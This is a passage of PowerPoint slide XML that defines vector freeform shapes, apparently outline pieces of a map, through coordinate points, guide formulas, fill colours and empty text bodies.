                  <a:gd name="T50" fmla="*/ 3 w 48"/>
                  <a:gd name="T51" fmla="*/ 38 h 41"/>
                  <a:gd name="T52" fmla="*/ 3 w 48"/>
                  <a:gd name="T53" fmla="*/ 36 h 41"/>
                  <a:gd name="T54" fmla="*/ 7 w 48"/>
                  <a:gd name="T55" fmla="*/ 33 h 41"/>
                  <a:gd name="T56" fmla="*/ 8 w 48"/>
                  <a:gd name="T57" fmla="*/ 32 h 41"/>
                  <a:gd name="T58" fmla="*/ 7 w 48"/>
                  <a:gd name="T59" fmla="*/ 30 h 41"/>
                  <a:gd name="T60" fmla="*/ 6 w 48"/>
                  <a:gd name="T61" fmla="*/ 30 h 41"/>
                  <a:gd name="T62" fmla="*/ 2 w 48"/>
                  <a:gd name="T63" fmla="*/ 30 h 41"/>
                  <a:gd name="T64" fmla="*/ 0 w 48"/>
                  <a:gd name="T65" fmla="*/ 28 h 41"/>
                  <a:gd name="T66" fmla="*/ 2 w 48"/>
                  <a:gd name="T67" fmla="*/ 23 h 41"/>
                  <a:gd name="T68" fmla="*/ 5 w 48"/>
                  <a:gd name="T69" fmla="*/ 18 h 41"/>
                  <a:gd name="T70" fmla="*/ 10 w 48"/>
                  <a:gd name="T71" fmla="*/ 12 h 41"/>
                  <a:gd name="T72" fmla="*/ 9 w 48"/>
                  <a:gd name="T73" fmla="*/ 10 h 41"/>
                  <a:gd name="T74" fmla="*/ 6 w 48"/>
                  <a:gd name="T75" fmla="*/ 8 h 41"/>
                  <a:gd name="T76" fmla="*/ 5 w 48"/>
                  <a:gd name="T77" fmla="*/ 8 h 41"/>
                  <a:gd name="T78" fmla="*/ 9 w 48"/>
                  <a:gd name="T79" fmla="*/ 4 h 41"/>
                  <a:gd name="T80" fmla="*/ 13 w 48"/>
                  <a:gd name="T81" fmla="*/ 0 h 41"/>
                  <a:gd name="T82" fmla="*/ 17 w 48"/>
                  <a:gd name="T83" fmla="*/ 0 h 41"/>
                  <a:gd name="T84" fmla="*/ 20 w 48"/>
                  <a:gd name="T85" fmla="*/ 1 h 41"/>
                  <a:gd name="T86" fmla="*/ 30 w 48"/>
                  <a:gd name="T87" fmla="*/ 1 h 4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48"/>
                  <a:gd name="T133" fmla="*/ 0 h 41"/>
                  <a:gd name="T134" fmla="*/ 48 w 48"/>
                  <a:gd name="T135" fmla="*/ 41 h 41"/>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48" h="41">
                    <a:moveTo>
                      <a:pt x="30" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="1"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36450" name="Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2753" y="2747"/>
                <a:ext cx="47" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 47"/>
                  <a:gd name="T1" fmla="*/ 10 h 97"/>
                  <a:gd name="T2" fmla="*/ 43 w 47"/>
                  <a:gd name="T3" fmla="*/ 15 h 97"/>
                  <a:gd name="T4" fmla="*/ 44 w 47"/>
                  <a:gd name="T5" fmla="*/ 21 h 97"/>
                  <a:gd name="T6" fmla="*/ 47 w 47"/>
                  <a:gd name="T7" fmla="*/ 26 h 97"/>
                  <a:gd name="T8" fmla="*/ 45 w 47"/>
                  <a:gd name="T9" fmla="*/ 33 h 97"/>
                  <a:gd name="T10" fmla="*/ 43 w 47"/>
                  <a:gd name="T11" fmla="*/ 37 h 97"/>
                  <a:gd name="T12" fmla="*/ 42 w 47"/>
                  <a:gd name="T13" fmla="*/ 39 h 97"/>
                  <a:gd name="T14" fmla="*/ 37 w 47"/>
                  <a:gd name="T15" fmla="*/ 42 h 97"/>
                  <a:gd name="T16" fmla="*/ 36 w 47"/>
                  <a:gd name="T17" fmla="*/ 45 h 97"/>
                  <a:gd name="T18" fmla="*/ 37 w 47"/>
                  <a:gd name="T19" fmla="*/ 49 h 97"/>
                  <a:gd name="T20" fmla="*/ 37 w 47"/>
                  <a:gd name="T21" fmla="*/ 52 h 97"/>
                  <a:gd name="T22" fmla="*/ 34 w 47"/>
                  <a:gd name="T23" fmla="*/ 53 h 97"/>
                  <a:gd name="T24" fmla="*/ 32 w 47"/>
                  <a:gd name="T25" fmla="*/ 53 h 97"/>
                  <a:gd name="T26" fmla="*/ 30 w 47"/>
                  <a:gd name="T27" fmla="*/ 56 h 97"/>
                  <a:gd name="T28" fmla="*/ 30 w 47"/>
                  <a:gd name="T29" fmla="*/ 58 h 97"/>
                  <a:gd name="T30" fmla="*/ 30 w 47"/>
                  <a:gd name="T31" fmla="*/ 62 h 97"/>
                  <a:gd name="T32" fmla="*/ 30 w 47"/>
                  <a:gd name="T33" fmla="*/ 68 h 97"/>
                  <a:gd name="T34" fmla="*/ 29 w 47"/>
                  <a:gd name="T35" fmla="*/ 75 h 97"/>
                  <a:gd name="T36" fmla="*/ 31 w 47"/>
                  <a:gd name="T37" fmla="*/ 86 h 97"/>
                  <a:gd name="T38" fmla="*/ 30 w 47"/>
                  <a:gd name="T39" fmla="*/ 94 h 97"/>
                  <a:gd name="T40" fmla="*/ 30 w 47"/>
                  <a:gd name="T41" fmla="*/ 96 h 97"/>
                  <a:gd name="T42" fmla="*/ 28 w 47"/>
                  <a:gd name="T43" fmla="*/ 96 h 97"/>
                  <a:gd name="T44" fmla="*/ 19 w 47"/>
                  <a:gd name="T45" fmla="*/ 97 h 97"/>
                  <a:gd name="T46" fmla="*/ 14 w 47"/>
                  <a:gd name="T47" fmla="*/ 97 h 97"/>
                  <a:gd name="T48" fmla="*/ 13 w 47"/>
                  <a:gd name="T49" fmla="*/ 96 h 97"/>
                  <a:gd name="T50" fmla="*/ 11 w 47"/>
                  <a:gd name="T51" fmla="*/ 88 h 97"/>
                  <a:gd name="T52" fmla="*/ 13 w 47"/>
                  <a:gd name="T53" fmla="*/ 83 h 97"/>
                  <a:gd name="T54" fmla="*/ 13 w 47"/>
                  <a:gd name="T55" fmla="*/ 77 h 97"/>
                  <a:gd name="T56" fmla="*/ 13 w 47"/>
                  <a:gd name="T57" fmla="*/ 73 h 97"/>
                  <a:gd name="T58" fmla="*/ 12 w 47"/>
                  <a:gd name="T59" fmla="*/ 66 h 97"/>
                  <a:gd name="T60" fmla="*/ 12 w 47"/>
                  <a:gd name="T61" fmla="*/ 60 h 97"/>
                  <a:gd name="T62" fmla="*/ 11 w 47"/>
                  <a:gd name="T63" fmla="*/ 56 h 97"/>
                  <a:gd name="T64" fmla="*/ 11 w 47"/>
                  <a:gd name="T65" fmla="*/ 52 h 97"/>
                  <a:gd name="T66" fmla="*/ 8 w 47"/>
                  <a:gd name="T67" fmla="*/ 43 h 97"/>
                  <a:gd name="T68" fmla="*/ 7 w 47"/>
                  <a:gd name="T69" fmla="*/ 38 h 97"/>
                  <a:gd name="T70" fmla="*/ 4 w 47"/>
                  <a:gd name="T71" fmla="*/ 35 h 97"/>
                  <a:gd name="T72" fmla="*/ 1 w 47"/>
                  <a:gd name="T73" fmla="*/ 33 h 97"/>
                  <a:gd name="T74" fmla="*/ 0 w 47"/>
                  <a:gd name="T75" fmla="*/ 30 h 97"/>
                  <a:gd name="T76" fmla="*/ 1 w 47"/>
                  <a:gd name="T77" fmla="*/ 26 h 97"/>
                  <a:gd name="T78" fmla="*/ 1 w 47"/>
                  <a:gd name="T79" fmla="*/ 23 h 97"/>
                  <a:gd name="T80" fmla="*/ 1 w 47"/>
                  <a:gd name="T81" fmla="*/ 22 h 97"/>
                  <a:gd name="T82" fmla="*/ 3 w 47"/>
                  <a:gd name="T83" fmla="*/ 21 h 97"/>
                  <a:gd name="T84" fmla="*/ 6 w 47"/>
                  <a:gd name="T85" fmla="*/ 17 h 97"/>
                  <a:gd name="T86" fmla="*/ 9 w 47"/>
                  <a:gd name="T87" fmla="*/ 15 h 97"/>
                  <a:gd name="T88" fmla="*/ 12 w 47"/>
                  <a:gd name="T89" fmla="*/ 14 h 97"/>
                  <a:gd name="T90" fmla="*/ 17 w 47"/>
                  <a:gd name="T91" fmla="*/ 15 h 97"/>
                  <a:gd name="T92" fmla="*/ 19 w 47"/>
                  <a:gd name="T93" fmla="*/ 14 h 97"/>
                  <a:gd name="T94" fmla="*/ 22 w 47"/>
                  <a:gd name="T95" fmla="*/ 11 h 97"/>
                  <a:gd name="T96" fmla="*/ 24 w 47"/>
                  <a:gd name="T97" fmla="*/ 5 h 97"/>
                  <a:gd name="T98" fmla="*/ 23 w 47"/>
                  <a:gd name="T99" fmla="*/ 2 h 97"/>
                  <a:gd name="T100" fmla="*/ 27 w 47"/>
                  <a:gd name="T101" fmla="*/ 0 h 97"/>
                  <a:gd name="T102" fmla="*/ 29 w 47"/>
                  <a:gd name="T103" fmla="*/ 0 h 97"/>
                  <a:gd name="T104" fmla="*/ 32 w 47"/>
                  <a:gd name="T105" fmla="*/ 2 h 97"/>
                  <a:gd name="T106" fmla="*/ 37 w 47"/>
                  <a:gd name="T107" fmla="*/ 6 h 97"/>
                  <a:gd name="T108" fmla="*/ 43 w 47"/>
                  <a:gd name="T109" fmla="*/ 10 h 97"/>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47"/>
                  <a:gd name="T166" fmla="*/ 0 h 97"/>
                  <a:gd name="T167" fmla="*/ 47 w 47"/>
                  <a:gd name="T168" fmla="*/ 97 h 97"/>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47" h="97">
                    <a:moveTo>
                      <a:pt x="43" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36451" name="Freeform 183"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2753" y="2747"/>
                <a:ext cx="47" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 43 w 47"/>
                  <a:gd name="T1" fmla="*/ 10 h 97"/>
                  <a:gd name="T2" fmla="*/ 43 w 47"/>
                  <a:gd name="T3" fmla="*/ 15 h 97"/>
                  <a:gd name="T4" fmla="*/ 44 w 47"/>
                  <a:gd name="T5" fmla="*/ 21 h 97"/>
                  <a:gd name="T6" fmla="*/ 47 w 47"/>
                  <a:gd name="T7" fmla="*/ 26 h 97"/>
                  <a:gd name="T8" fmla="*/ 45 w 47"/>
                  <a:gd name="T9" fmla="*/ 33 h 97"/>
                  <a:gd name="T10" fmla="*/ 43 w 47"/>
                  <a:gd name="T11" fmla="*/ 37 h 97"/>
                  <a:gd name="T12" fmla="*/ 42 w 47"/>
                  <a:gd name="T13" fmla="*/ 39 h 97"/>
                  <a:gd name="T14" fmla="*/ 37 w 47"/>
                  <a:gd name="T15" fmla="*/ 42 h 97"/>
                  <a:gd name="T16" fmla="*/ 36 w 47"/>
                  <a:gd name="T17" fmla="*/ 45 h 97"/>
                  <a:gd name="T18" fmla="*/ 37 w 47"/>
                  <a:gd name="T19" fmla="*/ 49 h 97"/>
                  <a:gd name="T20" fmla="*/ 37 w 47"/>
                  <a:gd name="T21" fmla="*/ 52 h 97"/>
                  <a:gd name="T22" fmla="*/ 34 w 47"/>
                  <a:gd name="T23" fmla="*/ 53 h 97"/>
                  <a:gd name="T24" fmla="*/ 32 w 47"/>
                  <a:gd name="T25" fmla="*/ 53 h 97"/>
                  <a:gd name="T26" fmla="*/ 30 w 47"/>
                  <a:gd name="T27" fmla="*/ 56 h 97"/>
                  <a:gd name="T28" fmla="*/ 30 w 47"/>
                  <a:gd name="T29" fmla="*/ 58 h 97"/>
                  <a:gd name="T30" fmla="*/ 30 w 47"/>
                  <a:gd name="T31" fmla="*/ 62 h 97"/>
                  <a:gd name="T32" fmla="*/ 30 w 47"/>
                  <a:gd name="T33" fmla="*/ 68 h 97"/>
                  <a:gd name="T34" fmla="*/ 29 w 47"/>
                  <a:gd name="T35" fmla="*/ 75 h 97"/>
                  <a:gd name="T36" fmla="*/ 31 w 47"/>
                  <a:gd name="T37" fmla="*/ 86 h 97"/>
                  <a:gd name="T38" fmla="*/ 30 w 47"/>
                  <a:gd name="T39" fmla="*/ 94 h 97"/>
                  <a:gd name="T40" fmla="*/ 30 w 47"/>
                  <a:gd name="T41" fmla="*/ 96 h 97"/>
                  <a:gd name="T42" fmla="*/ 28 w 47"/>
                  <a:gd name="T43" fmla="*/ 96 h 97"/>
                  <a:gd name="T44" fmla="*/ 19 w 47"/>
                  <a:gd name="T45" fmla="*/ 97 h 97"/>
                  <a:gd name="T46" fmla="*/ 14 w 47"/>
                  <a:gd name="T47" fmla="*/ 97 h 97"/>
                  <a:gd name="T48" fmla="*/ 13 w 47"/>
                  <a:gd name="T49" fmla="*/ 96 h 97"/>
                  <a:gd name="T50" fmla="*/ 11 w 47"/>
                  <a:gd name="T51" fmla="*/ 88 h 97"/>
                  <a:gd name="T52" fmla="*/ 13 w 47"/>
                  <a:gd name="T53" fmla="*/ 83 h 97"/>
                  <a:gd name="T54" fmla="*/ 13 w 47"/>
                  <a:gd name="T55" fmla="*/ 77 h 97"/>
                  <a:gd name="T56" fmla="*/ 13 w 47"/>
                  <a:gd name="T57" fmla="*/ 73 h 97"/>
                  <a:gd name="T58" fmla="*/ 12 w 47"/>
                  <a:gd name="T59" fmla="*/ 66 h 97"/>
                  <a:gd name="T60" fmla="*/ 12 w 47"/>
                  <a:gd name="T61" fmla="*/ 60 h 97"/>
                  <a:gd name="T62" fmla="*/ 11 w 47"/>
                  <a:gd name="T63" fmla="*/ 56 h 97"/>
                  <a:gd name="T64" fmla="*/ 11 w 47"/>
                  <a:gd name="T65" fmla="*/ 52 h 97"/>
                  <a:gd name="T66" fmla="*/ 8 w 47"/>
                  <a:gd name="T67" fmla="*/ 43 h 97"/>
                  <a:gd name="T68" fmla="*/ 7 w 47"/>
                  <a:gd name="T69" fmla="*/ 38 h 97"/>
                  <a:gd name="T70" fmla="*/ 4 w 47"/>
                  <a:gd name="T71" fmla="*/ 35 h 97"/>
                  <a:gd name="T72" fmla="*/ 1 w 47"/>
                  <a:gd name="T73" fmla="*/ 33 h 97"/>
                  <a:gd name="T74" fmla="*/ 0 w 47"/>
                  <a:gd name="T75" fmla="*/ 30 h 97"/>
                  <a:gd name="T76" fmla="*/ 1 w 47"/>
                  <a:gd name="T77" fmla="*/ 26 h 97"/>
                  <a:gd name="T78" fmla="*/ 1 w 47"/>
                  <a:gd name="T79" fmla="*/ 23 h 97"/>
                  <a:gd name="T80" fmla="*/ 1 w 47"/>
                  <a:gd name="T81" fmla="*/ 22 h 97"/>
                  <a:gd name="T82" fmla="*/ 3 w 47"/>
                  <a:gd name="T83" fmla="*/ 21 h 97"/>
                  <a:gd name="T84" fmla="*/ 6 w 47"/>
                  <a:gd name="T85" fmla="*/ 17 h 97"/>
                  <a:gd name="T86" fmla="*/ 9 w 47"/>
                  <a:gd name="T87" fmla="*/ 15 h 97"/>
                  <a:gd name="T88" fmla="*/ 12 w 47"/>
                  <a:gd name="T89" fmla="*/ 14 h 97"/>
                  <a:gd name="T90" fmla="*/ 17 w 47"/>
                  <a:gd name="T91" fmla="*/ 15 h 97"/>
                  <a:gd name="T92" fmla="*/ 19 w 47"/>
                  <a:gd name="T93" fmla="*/ 14 h 97"/>
                  <a:gd name="T94" fmla="*/ 22 w 47"/>
                  <a:gd name="T95" fmla="*/ 11 h 97"/>
                  <a:gd name="T96" fmla="*/ 24 w 47"/>
                  <a:gd name="T97" fmla="*/ 5 h 97"/>
                  <a:gd name="T98" fmla="*/ 23 w 47"/>
                  <a:gd name="T99" fmla="*/ 2 h 97"/>
                  <a:gd name="T100" fmla="*/ 27 w 47"/>
                  <a:gd name="T101" fmla="*/ 0 h 97"/>
                  <a:gd name="T102" fmla="*/ 29 w 47"/>
                  <a:gd name="T103" fmla="*/ 0 h 97"/>
                  <a:gd name="T104" fmla="*/ 32 w 47"/>
                  <a:gd name="T105" fmla="*/ 2 h 97"/>
                  <a:gd name="T106" fmla="*/ 37 w 47"/>
                  <a:gd name="T107" fmla="*/ 6 h 97"/>
                  <a:gd name="T108" fmla="*/ 43 w 47"/>
                  <a:gd name="T109" fmla="*/ 10 h 97"/>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47"/>
                  <a:gd name="T166" fmla="*/ 0 h 97"/>
                  <a:gd name="T167" fmla="*/ 47 w 47"/>
                  <a:gd name="T168" fmla="*/ 97 h 97"/>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47" h="97">
                    <a:moveTo>
                      <a:pt x="43" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="43" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
